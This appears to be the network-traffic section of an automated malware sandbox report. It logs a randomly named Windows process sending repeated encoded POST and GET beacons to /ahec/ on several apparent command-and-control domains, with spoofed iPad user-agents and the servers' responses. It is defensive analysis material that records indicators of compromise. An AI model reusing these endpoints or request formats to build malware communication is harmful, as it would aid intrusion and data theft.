                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        7 | 192.168.2.10 | 49719 | 172.67.184.73 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:14.481858969 CET | 1813 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        8 | 192.168.2.10 | 49720 | 172.67.184.73 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:17.139161110 CET | 508 | OUT | GET /ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.poria.link
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:47.750078917 CET | 814 | IN | HTTP/1.1 522
                                                                        Date: Sat, 02 Dec 2023 17:49:47 GMT
                                                                        Content-Type: text/plain; charset=UTF-8
                                                                        Content-Length: 15
                                                                        Connection: close
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lZu2Mgm21%2Bd0ILinXBin5hqJfTN2nMo%2B3sHFAavAknkdd%2Bfcl4ikiNePvBOQOG4TQ2Nf6FxFL%2BDirQUVbrBNiuOTRFH4w8rkMckGV5t3RYy8lpyU7y%2BRX1sCDWj2g%2F7YTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Referrer-Policy: same-origin
                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 82f567d66822399d-IAD
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                        Data Ascii: error code: 522


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        9 | 192.168.2.10 | 49721 | 37.140.192.89 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:53.556916952 CET | 795 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvfMktrP+bGdWyJzpz7Q==
                                                                        Dec 2, 2023 18:49:53.784667969 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:53 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.10 | 49722 | 37.140.192.89 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:56.308264971 CET | 815 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:56.536603928 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:56 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.10 | 49723 | 37.140.192.89 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:59.288974047 CET | 1828 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.makeinai.online
                                                                        Origin: http://www.makeinai.online
                                                                        Referer: http://www.makeinai.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:59.515948057 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:49:59 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"64f9f107-377d8"
                                                                        Content-Encoding: gzip
                                                                        Dec 2, 2023 18:49:59.516968012 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                        Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                        Dec 2, 2023 18:49:59.517009974 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                        Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                        Dec 2, 2023 18:49:59.517668962 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                        Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                        Dec 2, 2023 18:49:59.517688990 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                        Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                        Dec 2, 2023 18:49:59.518271923 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                        Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                        Dec 2, 2023 18:49:59.518295050 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                        Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                        Dec 2, 2023 18:49:59.734391928 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                        Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.10 | 49724 | 37.140.192.89 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:02.074521065 CET | 513 | OUT | GET /ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.makeinai.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:02.294822931 CET | 1340 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: nginx
                                                                        Date: Sat, 02 Dec 2023 17:50:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 227288
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "64f9f107-377d8"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.10 | 49725 | 131.153.147.90 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:08.703560114 CET | 801 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.instantconvey.com
                                                                        Origin: http://www.instantconvey.com
                                                                        Referer: http://www.instantconvey.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=fGFjl9hS4wS+iTIjzNBxOxFUw9O2cA2PVeH1ea1wxvFamxfy1FP7EyWHiBlbUqgKrX+XkhaRjeUM7e52IhDrUXgg8taayFa2P+zE+/pzV7wOiZGtFItz0kBafnZWaf8FymYXU6bNZLog7Nf96s5XO6C5sHcYcm3RuNA7t20aiGqT31z2OQ==
                                                                        Dec 2, 2023 18:50:08.807337999 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:08 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.10 | 49726 | 131.153.147.90 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:11.329054117 CET | 821 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.instantconvey.com
                                                                        Origin: http://www.instantconvey.com
                                                                        Referer: http://www.instantconvey.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9xamU7y7kP7DyWHphlSeKgRrXylkhmRjeQM7ax2dCroG3giwNaL9la2P+zE+/skV7oOip2tKNBw5EBbYnZWMf8BymZ0U4/zZJQg7Mv90edWH6C3oHd0MHfBj+Ynrlw+0Tjn/AflJtUqZn9ZqOL7Ssr2PYKJMew=
                                                                        Dec 2, 2023 18:50:11.433995008 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:11 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.10 | 49727 | 131.153.147.90 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:13.951523066 CET | 1834 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.instantconvey.com
                                                                        Origin: http://www.instantconvey.com
                                                                        Referer: http://www.instantconvey.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:14.057214975 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:13 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.10 | 49728 | 131.153.147.90 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:16.788357019 CET | 515 | OUT | GET /ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.instantconvey.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:16.890762091 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:16 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.10 | 49729 | 94.23.162.163 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:22.377563953 CET | 816 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FuVhYpj0iKyP22CouZA==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.10 | 49730 | 94.23.162.163 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:25.074394941 CET | 836 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POysjDVVZjZ9moafAsJs=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.10 | 49731 | 94.23.162.163 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:27.782480001 CET | 1849 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.domainappraisalbot.com
                                                                        Origin: http://www.domainappraisalbot.com
                                                                        Referer: http://www.domainappraisalbot.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.10 | 49732 | 94.23.162.163 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:30.486798048 CET | 520 | OUT | GET /ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.domainappraisalbot.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:30.667097092 CET | 391 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                        Date: Sat, 02 Dec 2023 17:50:30 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 178
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.10 | 49733 | 66.29.155.54 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:36.541908979 CET | 786 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
